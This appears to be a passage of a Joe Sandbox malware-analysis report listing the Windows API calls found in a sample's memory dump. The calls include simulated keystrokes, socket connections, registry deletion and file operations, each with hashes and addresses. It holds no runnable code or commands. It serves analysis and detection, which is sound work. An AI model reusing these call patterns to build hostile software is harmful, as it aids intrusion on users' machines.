                                                                                          • Part of subcall function 00AB436A: _wcscpy.LIBCMT ref: 00AB438D
                                                                                        • GetProcessId.KERNEL32(00000000), ref: 00B1FCB6
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B1FCE5
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                        • String ID: @
                                                                                        • API String ID: 3522835683-2766056989
                                                                                        APIs
                                                                                        • GetParent.USER32(?), ref: 00B0178B
                                                                                        • GetKeyboardState.USER32(?), ref: 00B017A0
                                                                                        • SetKeyboardState.USER32(?), ref: 00B01801
                                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00B0182F
                                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 00B0184E
                                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00B01894
                                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00B018B7
                                                                                        Similarity
                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                        • String ID:
                                                                                        • API String ID: 87235514-0
                                                                                        APIs
                                                                                        • GetParent.USER32(00000000), ref: 00B015A4
                                                                                        • GetKeyboardState.USER32(?), ref: 00B015B9
                                                                                        • SetKeyboardState.USER32(?), ref: 00B0161A
                                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00B01646
                                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00B01663
                                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00B016A7
                                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00B016C8
                                                                                        Similarity
                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                        • String ID:
                                                                                        • API String ID: 87235514-0
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: _wcsncpy$LocalTime
                                                                                        • String ID:
                                                                                        • API String ID: 2945705084-0
                                                                                        APIs
                                                                                          • Part of subcall function 00B04BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B03B8A,?), ref: 00B04BE0
                                                                                          • Part of subcall function 00B04BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B03B8A,?), ref: 00B04BF9
                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00B03BAA
                                                                                        • _wcscmp.LIBCMT ref: 00B03BC6
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00B03BDE
                                                                                        • _wcscat.LIBCMT ref: 00B03C26
                                                                                        • SHFileOperationW.SHELL32(?), ref: 00B03C92
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                        • String ID: \*.*
                                                                                        • API String ID: 1377345388-1173974218
                                                                                        • Opcode ID: 1a6f0b42561f0530f76a294dcd2ac0cb7d80f6be21579a05c5abaa7baffed8d5
                                                                                        • Instruction ID: d144a0cbe7ac6281615111499e238aa120a14473dbe62d467c57f42f1e90c11a
                                                                                        • Opcode Fuzzy Hash: 1a6f0b42561f0530f76a294dcd2ac0cb7d80f6be21579a05c5abaa7baffed8d5
                                                                                        • Instruction Fuzzy Hash: 32416D71508345AAC752EB64C485ADBBBECEF89740F5009AEF48AC3191EB34D688C752
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00B278CF
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B27976
                                                                                        • IsMenu.USER32(?), ref: 00B2798E
                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B279D6
                                                                                        • DrawMenuBar.USER32 ref: 00B279E9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 3866635326-4108050209
                                                                                        • Opcode ID: 0b788126283761f46813f6db0e4f3d547d93256626906097b5a527c767bf0b8a
                                                                                        • Instruction ID: 4f8f11a4e8a85d8d90edae5e586b33de28e4d036cadce84105cc8d23944d13d2
                                                                                        • Opcode Fuzzy Hash: 0b788126283761f46813f6db0e4f3d547d93256626906097b5a527c767bf0b8a
                                                                                        • Instruction Fuzzy Hash: D6416B71A04319EFDB10DF94E884E9ABBF5FF05310F0481A9E95997250CB74AD90CFA1
                                                                                        APIs
                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00B21631
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B2165B
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00B21712
                                                                                          • Part of subcall function 00B21602: RegCloseKey.ADVAPI32(?), ref: 00B21678
                                                                                          • Part of subcall function 00B21602: FreeLibrary.KERNEL32(?), ref: 00B216CA
                                                                                          • Part of subcall function 00B21602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00B216ED
                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00B216B5
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                        • String ID:
                                                                                        • API String ID: 395352322-0
                                                                                        • Opcode ID: 09d53224b0c883531ac25ad5c6c55bf9e3c0342ea90f37b726ddd528cf885688
                                                                                        • Instruction ID: 56e5b9a07b49f75d98acfb6764337dfcd722461366f83c8abf1ae7bcbebe7864
                                                                                        • Opcode Fuzzy Hash: 09d53224b0c883531ac25ad5c6c55bf9e3c0342ea90f37b726ddd528cf885688
                                                                                        • Instruction Fuzzy Hash: D8316BB191011CBFDB199F94EC99EFFB7BCEF18300F1005A9E505A3150EA709E459BA0
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00B26911
                                                                                        • GetWindowLongW.USER32(01125678,000000F0), ref: 00B26944
                                                                                        • GetWindowLongW.USER32(01125678,000000F0), ref: 00B26979
                                                                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00B269AB
                                                                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00B269D5
                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00B269E6
                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00B26A00
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongWindow$MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 2178440468-0
                                                                                        • Opcode ID: 72b648bb8241f4ac2d1d6e0880e6a87c631fc21cf5517c68c9214481e2ee4bb5
                                                                                        • Instruction ID: 991d727abf3efff01c3461b7f878cbb64b00bbb6e641b391a7eea339f2a8abfd
                                                                                        • Opcode Fuzzy Hash: 72b648bb8241f4ac2d1d6e0880e6a87c631fc21cf5517c68c9214481e2ee4bb5
                                                                                        • Instruction Fuzzy Hash: 7A311330654160AFDB21DF19EC99F6937E1FB8A714F2901A4F5188B2B1CF72AC80DB90
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AFE2CA
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AFE2F0
                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00AFE2F3
                                                                                        • SysAllocString.OLEAUT32(?), ref: 00AFE311
                                                                                        • SysFreeString.OLEAUT32(?), ref: 00AFE31A
                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00AFE33F
                                                                                        • SysAllocString.OLEAUT32(?), ref: 00AFE34D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                        • String ID:
                                                                                        • API String ID: 3761583154-0
                                                                                        • Opcode ID: 9b38009a241c66ccdb567882f8578fabc9b28686e5bb00b92de90356e69b207b
                                                                                        • Instruction ID: fdff49ad2734fb387545f5e12b0d957bf482e09d76065580445b173cfb5c0201
                                                                                        • Opcode Fuzzy Hash: 9b38009a241c66ccdb567882f8578fabc9b28686e5bb00b92de90356e69b207b
                                                                                        • Instruction Fuzzy Hash: 5221417660421DAF9F10EFA8DC88DBE77BCEF09760B548129FA14DB260DA70AD458760
                                                                                        APIs
                                                                                          • Part of subcall function 00B18475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00B184A0
                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00B168B1
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00B168C0
                                                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00B168F9
                                                                                        • connect.WSOCK32(00000000,?,00000010), ref: 00B16902
                                                                                        • WSAGetLastError.WSOCK32 ref: 00B1690C
                                                                                        • closesocket.WSOCK32(00000000), ref: 00B16935
                                                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00B1694E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                        • String ID:
                                                                                        • API String ID: 910771015-0
                                                                                        • Opcode ID: 040cff1ce8bcd9a658e3d31c627f40d7a539be689d8d0445bed555219a4deb00
                                                                                        • Instruction ID: 2d438766ae579b95779d163f0c01ff404c0faa92915ceac1d96b5bc2faae17ea
                                                                                        • Opcode Fuzzy Hash: 040cff1ce8bcd9a658e3d31c627f40d7a539be689d8d0445bed555219a4deb00
                                                                                        • Instruction Fuzzy Hash: F831C271600208AFDB10AF64CC85BFE77E9EF49760F544069FD05AB291CB74AC448BA1
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AFE3A5
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AFE3CB
                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00AFE3CE
                                                                                        • SysAllocString.OLEAUT32 ref: 00AFE3EF
                                                                                        • SysFreeString.OLEAUT32 ref: 00AFE3F8
                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00AFE412
                                                                                        • SysAllocString.OLEAUT32(?), ref: 00AFE420
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                        • String ID:
                                                                                        • API String ID: 3761583154-0
                                                                                        • Opcode ID: 1f290abe32cc6b190817553e33274da77769af47b9564e8fa2db14c35822a6fb
                                                                                        • Instruction ID: c46430ff599f8e4ba5495679174884933cdfcac569e8b8bf14c52100f27fa9ba
                                                                                        • Opcode Fuzzy Hash: 1f290abe32cc6b190817553e33274da77769af47b9564e8fa2db14c35822a6fb
                                                                                        • Instruction Fuzzy Hash: E5215835604108AF9B10EFE8DC89DBE77ECEF093607108529FA15CB271DA75ED418764
                                                                                        APIs
                                                                                          • Part of subcall function 00AA2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AA214F
                                                                                          • Part of subcall function 00AA2111: GetStockObject.GDI32(00000011), ref: 00AA2163
                                                                                          • Part of subcall function 00AA2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AA216D
                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00B27C57
                                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00B27C64
                                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00B27C6F
                                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00B27C7E
                                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00B27C8A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                                        • String ID: Msctls_Progress32
                                                                                        • API String ID: 1025951953-3636473452
                                                                                        • Opcode ID: eb55f4644463ad05ef9cda9c6bc230b2a684a76f6ce6303af51da8c9452c83bb
                                                                                        • Instruction ID: 7965b1d5ed33c275a673a3dda6e28f3e2c6282e03f9b3faefc688865d38cce10
                                                                                        • Opcode Fuzzy Hash: eb55f4644463ad05ef9cda9c6bc230b2a684a76f6ce6303af51da8c9452c83bb
                                                                                        • Instruction Fuzzy Hash: 6011B6B1150219BFEF159F60DC85EE77F5DEF08758F014114BA08A2090CB719C21DBA4
                                                                                        APIs
                                                                                        • __init_pointers.LIBCMT ref: 00AC9D16
                                                                                          • Part of subcall function 00AC33B7: EncodePointer.KERNEL32(00000000), ref: 00AC33BA
                                                                                          • Part of subcall function 00AC33B7: __initp_misc_winsig.LIBCMT ref: 00AC33D5
                                                                                          • Part of subcall function 00AC33B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00ACA0D0
                                                                                          • Part of subcall function 00AC33B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00ACA0E4
                                                                                          • Part of subcall function 00AC33B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00ACA0F7
                                                                                          • Part of subcall function 00AC33B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00ACA10A
                                                                                          • Part of subcall function 00AC33B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00ACA11D
                                                                                          • Part of subcall function 00AC33B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00ACA130
                                                                                          • Part of subcall function 00AC33B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00ACA143
                                                                                          • Part of subcall function 00AC33B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00ACA156
                                                                                          • Part of subcall function 00AC33B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00ACA169
                                                                                          • Part of subcall function 00AC33B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00ACA17C
                                                                                          • Part of subcall function 00AC33B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00ACA18F
                                                                                          • Part of subcall function 00AC33B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00ACA1A2
                                                                                          • Part of subcall function 00AC33B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00ACA1B5
                                                                                          • Part of subcall function 00AC33B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00ACA1C8
                                                                                          • Part of subcall function 00AC33B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00ACA1DB
                                                                                          • Part of subcall function 00AC33B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00ACA1EE
                                                                                        • __mtinitlocks.LIBCMT ref: 00AC9D1B
                                                                                        • __mtterm.LIBCMT ref: 00AC9D24
                                                                                          • Part of subcall function 00AC9D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00AC9D29,00AC7EFD,00B5CD38,00000014), ref: 00AC9E86
                                                                                          • Part of subcall function 00AC9D8C: _free.LIBCMT ref: 00AC9E8D
                                                                                          • Part of subcall function 00AC9D8C: DeleteCriticalSection.KERNEL32(00B60C00,?,?,00AC9D29,00AC7EFD,00B5CD38,00000014), ref: 00AC9EAF
                                                                                        • __calloc_crt.LIBCMT ref: 00AC9D49
                                                                                        • __initptd.LIBCMT ref: 00AC9D6B
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00AC9D72
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                        • String ID:
                                                                                        • API String ID: 3567560977-0
                                                                                        • Opcode ID: f8ba367531672169db8c7e827ae8041c87f59bbf636b0e9fa527c1316a1e5e52
                                                                                        • Instruction ID: 9e36d046ae34f556cdad15ec07a50cf8fd49accb6045af514b911d7fc01a5f8e
                                                                                        • Opcode Fuzzy Hash: f8ba367531672169db8c7e827ae8041c87f59bbf636b0e9fa527c1316a1e5e52
                                                                                        • Instruction Fuzzy Hash: 87F06D325197116AE7357B787D0BF8B26D4DF41770F23461DF462E60D2EF1089014195
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00AC4282,?), ref: 00AC41D3
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00AC41DA
                                                                                        • EncodePointer.KERNEL32(00000000), ref: 00AC41E6
                                                                                        • DecodePointer.KERNEL32(00000001,00AC4282,?), ref: 00AC4203
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                        • String ID: RoInitialize$combase.dll
                                                                                        • API String ID: 3489934621-340411864
                                                                                        • Opcode ID: 4f6b636428d73d1c783cc155f1ad97f862d86721d848c41ce410ddd3e71dd5fc
                                                                                        • Instruction ID: 1233dcd7bc3c1cc5bef9455b49de3e453928714e1efe4b82715ac39a69d22154
                                                                                        • Opcode Fuzzy Hash: 4f6b636428d73d1c783cc155f1ad97f862d86721d848c41ce410ddd3e71dd5fc
                                                                                        • Instruction Fuzzy Hash: 1FE0E5B46A1701AFEB202B70EC5DB093AA4AB1AB06F704668F441E70F0CFF941948F04
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00AC41A8), ref: 00AC42A8
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00AC42AF
                                                                                        • EncodePointer.KERNEL32(00000000), ref: 00AC42BA
                                                                                        • DecodePointer.KERNEL32(00AC41A8), ref: 00AC42D5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                        • String ID: RoUninitialize$combase.dll
                                                                                        • API String ID: 3489934621-2819208100
                                                                                        • Opcode ID: 27c11bc42f47f9dd2d60dc57246d82bc426a3725aa816820e8a41c7bd0ba45c7
                                                                                        • Instruction ID: 40a0a3f60ad4700695cd05b6846b7823b3b19190fae545ef7c3cb2cd8defeafb
                                                                                        • Opcode Fuzzy Hash: 27c11bc42f47f9dd2d60dc57246d82bc426a3725aa816820e8a41c7bd0ba45c7
                                                                                        • Instruction Fuzzy Hash: E1E0B670560B00ABEB20AF60AD1DB493AA4BB09B02F600168F041E74F0CFF84594CB14
                                                                                        APIs
                                                                                        • GetClientRect.USER32(?,?), ref: 00AA21B8
                                                                                        • GetWindowRect.USER32(?,?), ref: 00AA21F9
                                                                                        • ScreenToClient.USER32(?,?), ref: 00AA2221
                                                                                        • GetClientRect.USER32(?,?), ref: 00AA2350
                                                                                        • GetWindowRect.USER32(?,?), ref: 00AA2369
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Rect$Client$Window$Screen
                                                                                        • String ID:
                                                                                        • API String ID: 1296646539-0
                                                                                        • Opcode ID: 73cd1d92c7d32771e85d307e06edb3bb8dc1891cea4b6d8f0901389862ab4491
                                                                                        • Instruction ID: 14f27c08b79d43a0f17197b3438489bb1e07fb17f6e48e5f9f0417cf17f9ea21
                                                                                        • Opcode Fuzzy Hash: 73cd1d92c7d32771e85d307e06edb3bb8dc1891cea4b6d8f0901389862ab4491
                                                                                        • Instruction Fuzzy Hash: 59B15C39910249DBDF10CFA8C9807EDB7B1FF49710F14812AED59AB294DB34AA60DB64
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
